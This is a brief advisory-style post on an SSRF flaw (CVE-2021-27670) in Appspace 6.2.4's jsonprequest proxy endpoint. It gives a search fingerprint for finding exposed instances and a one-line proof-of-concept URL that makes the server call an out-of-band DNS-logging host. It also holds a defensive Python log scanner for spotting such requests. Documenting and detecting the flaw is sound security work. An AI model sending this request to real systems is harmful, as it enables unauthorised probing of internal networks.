Appspace jsonprequest SSRF vulnerability CVE-2021-27670

Vulnerability Description

Appspace 6.2.4 is vulnerable to server-side request forgery (SSRF) through the api/v1/core/proxy/jsonprequest interface, endangering system security.

Vulnerability Impact

Appspace 6.2.4

Network surveying and mapping

app="Sign-in-to-Appspace-Core"

Vulnerability Reproduction

The login page is shown below:

[Image: login page]

Verification PoC

/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=https://lo2z02.dnslog.cn
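For defenders checking whether this endpoint has been requested on their own server, the following added example (not part of the original post and not Appspace code) scans web access log lines for calls to the jsonprequest proxy and classifies the host named in the url parameter. The Combined Log Format layout, the sample log lines and the function names are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/api/v1/core/proxy/jsonprequest"  # path taken from the advisory
# Assumption: the request line appears as "METHOD target HTTP/x.y" (Combined Log Format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation/test addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Mar/2021:10:00:01 +0000] "GET /api/v1/core/proxy/jsonprequest'
    '?objresponse=false&websiteproxy=true&escapestring=false'
    '&url=https://callback.example.test HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Mar/2021:10:00:09 +0000] "GET /api/v1/core/proxy/jsonprequest'
    '?url=http%3A%2F%2F10.0.0.5%2Fstatus HTTP/1.1" 200 90',
    '198.51.100.4 - - [01/Mar/2021:10:01:00 +0000] "GET /login HTTP/1.1" 200 1024',
]

def classify_target(url):
    """Classify the host the proxy was asked to fetch, for triage priority."""
    host = urlsplit(url).hostname
    if host is None:
        return "unparseable"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: single-label names usually resolve internally.
        return "internal-name" if host == "localhost" or "." not in host else "external-host"
    if ip.is_loopback or ip.is_private or ip.is_link_local:
        return "internal-address"
    return "external-address"

def find_proxy_requests(lines):
    """Return (client, requested_url, classification) for each proxy call found."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        # Compare case-insensitively and ignore a trailing slash.
        if parts.path.rstrip("/").lower() != ENDPOINT:
            continue
        client = line.split(" ", 1)[0]
        # parse_qs percent-decodes values, so encoded targets are normalised.
        for url in parse_qs(parts.query).get("url", []):
            findings.append((client, url, classify_target(url)))
    return findings

if __name__ == "__main__":
    for finding in find_proxy_requests(SAMPLE_LOG):
        print(finding)
```

Any hit is worth reviewing, since the endpoint makes the server fetch a caller-supplied URL; hits classified as internal deserve priority.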

This post is licensed under CC BY 4.0 by the author.